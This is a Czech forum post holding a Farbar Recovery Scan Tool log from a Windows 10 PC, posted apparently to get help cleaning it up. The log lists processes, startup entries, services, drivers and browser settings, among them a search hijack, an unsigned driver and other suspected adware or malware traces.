Dekuji
log:
Kód: Vybrat vše
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-09-2020
Ran by Milan (administrator) on DESKTOP-AJHPLSQ (Gigabyte Technology Co., Ltd. GA-770T-D3L) (11-09-2020 14:27:29)
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Platform: Windows 10 Home Version 1909 18363.1016 (X64) Language: Čeština (Česko)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTAgent.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTShellHlp.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswEngSrv.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswidsagent.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGSvc.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGUI.exe <2>
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\wsc_proxy.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler64.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(LAVASOFT SOFTWARE CANADA INC -> Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Milan\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBarFT.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe <3>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\spool\drivers\x64\3\E_YATIUNE.EXE <2>
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe <6>
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156808 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646776 2020-03-12] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [DiskFixer] => C:\Program Files (x86)\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [451952 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [90951544 2020-09-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000001] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [8146520 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> Lavasoft)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe"
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} - "H:\setup.exe"
HKLM\...\Print\Monitors\EPSON L3150 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBUNE.DLL [184832 2017-07-14] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [500736 2016-09-14] (SEIKO EPSON CORPORATION) [File not signed]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{48F69C39-1356-4A7B-A899-70E3539D4982}] -> C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\Installer\chrmstp.exe [2020-09-10] (AVG Technologies USA, LLC -> AVG Technologies)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-03-21]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {08C10116-0F05-4F1B-AF73-06B589373F46} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14679256 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {08E8831B-9A9D-4E04-A6EB-BD404165222C} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3858056 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {0F26C413-9F83-4AF2-812E-BAA9DD4D1CD7} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {2F09ED43-2A3D-464C-B5E5-B157022CE7EB} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_Plugin.exe [1502264 2020-09-08] (Adobe Inc. -> Adobe)
Task: {53EE07E4-1B5A-4925-9B87-CA84FDB1ED99} - System32\Tasks\AVGUpdateTaskMachineUA => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {79E87EF1-4D71-44FC-8873-A72C39CD80FC} - System32\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {7A446EC8-82DB-4A54-945E-27A566D3080B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [660688 2020-09-02] (Mozilla Corporation -> Mozilla Foundation)
Task: {94BE50EC-EFA1-4E08-9A28-6830D1121378} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2020-03-21] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {95CA5060-B138-497D-90C3-645A155D24D6} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1792136 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A77F7A79-4A0D-4E72-958D-1F2DA35B6B16} - System32\Tasks\AVG Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A86F3AA5-DE31-43BF-9913-2D9A69740383} - System32\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {BC8897D4-CC61-4362-8CDD-944E4953143E} - System32\Tasks\AVG Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {EA92647F-8039-4B01-9080-AE7111B54CD3} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{3B3152EA-857D-47CF-AB25-91BD1A979357} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{82897F20-ADA3-49EB-B2E4-DAED68663EB8} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 213.46.172.37 213.46.172.36
Tcpip\..\Interfaces\{e8de9f77-ea67-4223-a7f4-f48222bdaf84}: [DhcpNameServer] 213.46.172.37 213.46.172.36
Internet Explorer:
==================
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
SearchScopes: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\jp2ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default [2020-09-11]
Edge Extension: (Microsoft Protect) - C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fcppdfelojakeahklfgkjegnpbgndoch [2020-08-29]
FireFox:
========
FF DefaultProfile: omklf3yt.default
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\omklf3yt.default [2020-08-29]
FF NewTab: Mozilla\Firefox\Profiles\omklf3yt.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release [2020-09-11]
FF Notifications: Mozilla\Firefox\Profiles\nh2u98jr.default-release -> hxxps://cs70.divokekmeny.cz
FF Extension: (Mozilla Official) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2020-08-29] [not signed]
FF Extension: (Greasemonkey) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-03-18]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\dtplugin\npDeployJava1.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\plugin2\npjp2.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=3 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=9 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @videolan.org/vlc,version=3.0.10 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3668944 2020-08-08] (philandro Software GmbH -> philandro Software GmbH)
S2 avg; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [354272 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [7823296 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgm; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
S3 AVGSecureBrowserElevationService; C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\elevation_service.exe [1343656 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe [6986096 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2019-09-19] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [29272 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\NisSrv.exe [2169568 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\MsMpEng.exe [128376 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37208 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [205952 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [235656 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [195720 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61064 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16320 2020-08-29] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [42840 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175264 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgNetHub; C:\WINDOWS\System32\drivers\avgNetHub.sys [515600 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [109336 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [84912 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [851664 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [466816 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [217392 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [323848 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2020-01-09] (Microsoft Corporation) [File not signed]
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [42256 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [59344 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [78216 2020-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [430320 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [98520 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-09-11 14:27 - 2020-09-11 14:29 - 000020645 _____ C:\Users\Milan\Desktop\FRST.txt
2020-09-11 14:27 - 2020-09-11 14:28 - 000000000 ____D C:\FRST
2020-09-11 14:27 - 2020-09-11 14:27 - 000000000 _____ C:\Users\Milan\Desktop\Nový textový dokument.txt
2020-09-11 14:24 - 2020-09-11 14:25 - 002297344 _____ (Farbar) C:\Users\Milan\Desktop\FRST64.exe
2020-09-09 07:11 - 2020-09-09 07:11 - 000000000 ____D C:\Users\Milan\AppData\Local\CrashDumps
2020-09-09 07:03 - 2020-09-09 07:03 - 001728079 _____ C:\Users\Milan\Downloads\pz_II_c_87_01.rar
2020-09-06 14:21 - 2020-09-06 15:02 - 733129592 _____ C:\Users\Milan\Downloads\Šifra mistra Leonarda super film cz dabing dvdrip.avi
2020-09-06 12:20 - 2020-09-06 13:13 - 932525132 _____ C:\Users\Milan\Downloads\Apocalipto.avi
2020-09-02 20:01 - 2020-09-02 20:01 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-09-02 15:58 - 2020-09-02 20:04 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-08-30 12:28 - 2020-08-30 14:19 - 1992979015 _____ C:\Users\Milan\Downloads\The.Debt.Collectors.2.2020.PROPER.1080p.WEBRip.x264-RARBG.mp4
2020-08-29 22:45 - 2020-09-10 15:06 - 000002375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-09-10 15:06 - 000002340 _____ C:\Users\Public\Desktop\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-08-29 22:45 - 000003826 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Hourly)
2020-08-29 22:45 - 2020-08-29 22:45 - 000003242 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Logon)
2020-08-29 22:41 - 2020-08-29 22:41 - 000003468 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineUA
2020-08-29 22:41 - 2020-08-29 22:41 - 000003344 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineCore
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ___HD C:\$AV_AVG
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\AVG
2020-08-29 22:40 - 2020-08-29 22:45 - 000000000 ____D C:\Users\Milan\AppData\Local\Avg
2020-08-29 22:40 - 2020-08-29 22:40 - 000002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000002063 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Roaming\AVG
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Local\CEF
2020-08-29 22:39 - 2020-09-02 14:57 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-08-29 22:39 - 2020-08-29 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-08-29 22:38 - 2020-08-29 22:39 - 000323848 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000851664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000515600 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetHub.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000466816 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000336520 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-08-29 22:38 - 2020-08-29 22:38 - 000235656 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000217392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000205952 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000195720 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000175264 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000109336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000084912 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000061064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000042840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000037208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000016320 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgElam.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\Common Files\AVG
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\AVG
2020-08-29 22:37 - 2020-09-03 16:57 - 000000000 ____D C:\ProgramData\AVG
2020-08-29 22:37 - 2020-08-29 22:37 - 000271696 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Milan\Downloads\avg_antivirus_free_setup.exe
2020-08-29 18:07 - 2020-08-29 22:38 - 000000000 ____D C:\Users\Milan\AppData\Roaming\3k52z4f5aim
2020-08-29 18:07 - 2020-08-29 22:37 - 000000000 ____D C:\Program Files\M3PY0PHHSX
2020-08-29 17:53 - 2020-08-29 17:53 - 000025368 _____ (FsFilter Network) C:\WINDOWS\0246CDED558E.sys
2020-08-29 17:52 - 2020-09-10 07:43 - 000001039 _____ C:\Users\Milan\Desktop\ScrSnap.lnk
